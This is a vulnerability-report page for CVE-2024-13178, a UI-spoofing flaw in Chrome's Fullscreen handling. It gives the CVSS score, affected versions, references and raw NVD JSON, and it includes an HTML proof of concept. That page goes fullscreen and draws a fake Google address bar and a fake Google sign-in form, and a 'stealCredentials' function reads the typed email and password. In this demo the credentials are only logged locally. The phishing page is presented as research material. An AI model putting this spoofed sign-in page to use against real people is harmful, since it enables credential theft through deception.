Security Vulnerability Report
CVE-2024-13178 CVSS 4.3 MEDIUM

CVE-2024-13178

Published: 2025-11-14 03:15:55
Last Modified: 2025-11-17 12:25:14

Description

Inappropriate implementation in Fullscreen in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 128.0.6613.84

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2024-13178 PoC - UI Spoofing via Fullscreen API -->
<!DOCTYPE html>
<html>
<head>
  <title>CVE-2024-13178 UI Spoofing PoC</title>
  <style>
    body { margin: 0; background: #1a1a2e; color: white; font-family: Arial, sans-serif; }
    .fake-ui { position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); display: flex; flex-direction: column; align-items: center; justify-content: center; z-index: 999999; }
    .fake-address-bar { position: fixed; top: 0; left: 0; width: 100%; height: 40px; background: #f8f9fa; display: flex; align-items: center; padding: 0 10px; box-sizing: border-box; color: #333; font-size: 14px; }
    .fake-form { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 10px 30px rgba(0,0,0,0.3); text-align: center; }
    input { width: 250px; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 5px; color: #333; }
    .attack-btn { background: #4285f4; color: white; border: none; padding: 12px 30px; border-radius: 5px; cursor: pointer; font-size: 16px; }
  </style>
</head>
<body>
  <!-- Hidden template: spoofed address bar plus a fake sign-in form -->
  <div id="malicious-content" style="display:none;">
    <div class="fake-ui">
      <div class="fake-address-bar">🔒 https://www.google.com</div>
      <div class="fake-form">
        <h2 style="color:#333;">Sign in to Google</h2>
        <input type="text" placeholder="Email or phone">
        <input type="password" placeholder="Password">
        <button class="attack-btn" onclick="stealCredentials()">Sign In</button>
      </div>
    </div>
  </div>

  <h1>CVE-2024-13178 UI Spoofing Demo</h1>
  <p>Click the button below to trigger fullscreen and see UI spoofing in action.</p>
  <button onclick="requestFullscreen()" style="padding:15px 30px;font-size:18px;cursor:pointer;">
    Enter Fullscreen (Click to trigger)
  </button>

  <script>
    // The appended overlay; kept so the form handler reads the visible
    // inputs rather than the hidden template's copies.
    let overlay = null;

    async function requestFullscreen() {
      try {
        // Create and append malicious UI elements (a copy of the hidden template)
        overlay = document.createElement('div');
        overlay.innerHTML = document.getElementById('malicious-content').innerHTML;
        document.body.appendChild(overlay);
        // Request fullscreen on the document element (requires a user gesture)
        await document.documentElement.requestFullscreen();
        // Overlay attack content
        overlay.querySelector('.fake-ui').style.display = 'flex';
      } catch (err) {
        console.error('Fullscreen request failed:', err);
      }
    }

    function stealCredentials() {
      // Simulate credential theft: read the visible overlay's inputs
      const inputs = (overlay || document).querySelectorAll('input');
      const credentials = {
        email: inputs[0].value,
        password: inputs[1].value
      };
      console.log('Stolen credentials:', credentials);
      alert('Credentials captured! (This is a demo)');
    }
  </script>
</body>
</html>

References

https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html - Release Notes, Vendor Advisory
https://issues.chromium.org/issues/40068607 - Exploit, Issue Tracking, Third Party Advisory

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2024-13178",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-14T03:15:55.220",
    "lastModified": "2025-11-17T12:25:13.680",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Inappropriate implementation in Fullscreen in Google Chrome prior to 128.0.6613.84 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)"}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-451"}]
      }
    ],
    "configurations": [
      {
        "operator": "AND",
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "128.0.6613.84", "matchCriteriaId": "DAE0C7AB-1D61-4449-BC82-915B019F311F"}
            ]
          },
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"},
              {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"},
              {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]},
      {"url": "https://issues.chromium.org/issues/40068607", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}
    ]
  }
}